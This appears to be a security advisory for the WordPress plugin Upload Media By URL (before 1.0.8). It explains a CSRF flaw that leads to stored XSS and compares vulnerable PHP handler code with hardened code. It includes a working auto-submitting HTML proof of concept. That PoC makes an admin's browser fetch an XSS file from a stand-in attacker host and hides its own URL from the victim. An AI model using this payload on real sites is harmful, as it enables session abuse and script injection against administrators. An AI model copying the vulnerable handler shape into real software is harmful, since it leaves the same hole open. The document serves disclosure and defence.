wpexploit / Dmitriy / WPEX-ID: 16375A7F-0A9F-4961-8510-D047FFBF3954
History: Aug 02, 2023 - 12:00 a.m.

Upload Media By URL < 1.0.8 - Stored XSS via CSRF

Published: 2023-08-02 00:00:00
Author: Dmitriy
Tags: stored xss, cross-site request forgery, unfiltered html, html file upload, example.com, attacker.com

EPSS: 0.001 (percentile 30.6%)

Description: The plugin performs no CSRF (nonce) check when it processes a file upload request, so an attacker can make a logged-in admin's browser submit an upload on their behalf. Because WordPress only permits .htm/.html uploads for users holding the unfiltered_html capability, a victim with that capability can be made to upload an HTML file containing attacker-controlled JavaScript, turning the CSRF into a stored XSS hosted on the site.

Have a logged-in user with the unfiltered_html capability open an attacker-controlled HTML page containing the following. The page auto-submits a form to the site's upload handler, which makes the victim's browser (carrying their session cookie) fetch and store xss.html from attacker.com:

<html>
  <body>
  <!-- Rewrite the visible URL to "/" so the victim does not see the attacker page address -->
  <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST to the vulnerable upload handler; no nonce field is needed because none is checked -->
    <form action="https://example.com/wp-admin/upload.php" method="POST">
      <!-- The plugin fetches this URL server-side and stores the result as an upload -->
      <input type="hidden" name="multiurl" value="https://attacker.com/xss.html" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      <!-- Submit without any user interaction -->
      document.forms[0].submit();
    </script>
  </body>
</html>
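For contrast, the following is an added illustration (not the Upload Media By URL plugin's own code, and not the vendor's fix) of what the vulnerable handler shape looks like beside a hardened version. The function names, the nonce action 'umbu_sideload', the nonce field name 'umbu_nonce' and the use of the admin_init hook are assumptions; the WordPress functions called (check_admin_referer, wp_nonce_field, current_user_can, wp_check_filetype, get_allowed_mime_types, download_url, media_handle_sideload) are real core APIs.

```php
<?php
// Added example, not the plugin's source. Hypothetical handler names and
// nonce action/field names; the WordPress core functions are real.

// --- Vulnerable shape (illustrative): trusts any POST carrying 'multiurl'. ---
// A cross-site form can trigger this because the only thing it relies on is
// the victim's session cookie, which the browser attaches automatically.
function umbu_handle_multiurl_vulnerable() {
    if ( empty( $_POST['multiurl'] ) ) {
        return;
    }
    $url = esc_url_raw( wp_unslash( $_POST['multiurl'] ) );
    umbu_sideload_from_url( $url ); // no nonce, no Origin check
}

// --- Hardened version: nonce + capability + per-user file type allowlist. ---
add_action( 'admin_init', 'umbu_handle_multiurl_hardened' );

function umbu_handle_multiurl_hardened() {
    if ( empty( $_POST['multiurl'] ) ) {
        return;
    }

    // 1. Authorization: only users allowed to upload at all.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // 2. CSRF: the nonce is bound to the action and to the logged-in user's
    //    session, so an attacker's page cannot know it. check_admin_referer()
    //    calls wp_die() when the nonce is missing or invalid.
    check_admin_referer( 'umbu_sideload', 'umbu_nonce' );

    $url = esc_url_raw( wp_unslash( $_POST['multiurl'] ) );
    if ( ! wp_http_validate_url( $url ) ) {
        wp_die( 'Invalid URL.', '', array( 'response' => 400 ) );
    }

    // 3. File type: check the extension against the allowlist WordPress computes
    //    for the current user (htm/html is absent unless they have unfiltered_html).
    //    A stricter plugin would use its own media-only allowlist here.
    $filename = basename( (string) parse_url( $url, PHP_URL_PATH ) );
    $type     = wp_check_filetype( $filename, get_allowed_mime_types() );
    if ( empty( $type['ext'] ) ) {
        wp_die( 'File type not permitted.', '', array( 'response' => 400 ) );
    }

    umbu_sideload_from_url( $url );
}

// Shared helper (assumed): fetch the remote file and store it as an attachment.
function umbu_sideload_from_url( $url ) {
    require_once ABSPATH . 'wp-admin/includes/file.php';
    require_once ABSPATH . 'wp-admin/includes/media.php';
    require_once ABSPATH . 'wp-admin/includes/image.php';

    $tmp = download_url( $url );
    if ( is_wp_error( $tmp ) ) {
        wp_die( esc_html( $tmp->get_error_message() ), '', array( 'response' => 502 ) );
    }

    $file_array = array(
        'name'     => basename( (string) parse_url( $url, PHP_URL_PATH ) ),
        'tmp_name' => $tmp,
    );
    // media_handle_sideload() re-validates the type via wp_handle_sideload().
    $attachment_id = media_handle_sideload( $file_array, 0 );
    if ( is_wp_error( $attachment_id ) ) {
        @unlink( $tmp );
        wp_die( esc_html( $attachment_id->get_error_message() ), '', array( 'response' => 400 ) );
    }
    return $attachment_id;
}

// The form the plugin renders. wp_nonce_field() emits the hidden 'umbu_nonce'
// input that the cross-site PoC above cannot supply.
function umbu_render_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'upload.php' ) ) . '">';
    wp_nonce_field( 'umbu_sideload', 'umbu_nonce' );
    echo '<input type="url" name="multiurl" required />';
    submit_button( 'Upload from URL' );
    echo '</form>';
}
```

The PoC on this page fails against the hardened handler at step 2: the forged form carries only the session cookie, not the per-user nonce, so check_admin_referer() terminates the request before any download happens. Steps 1 and 3 are defence in depth; they do not stop the CSRF by themselves, since the advisory's victim is an admin who legitimately holds both upload_files and unfiltered_html.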
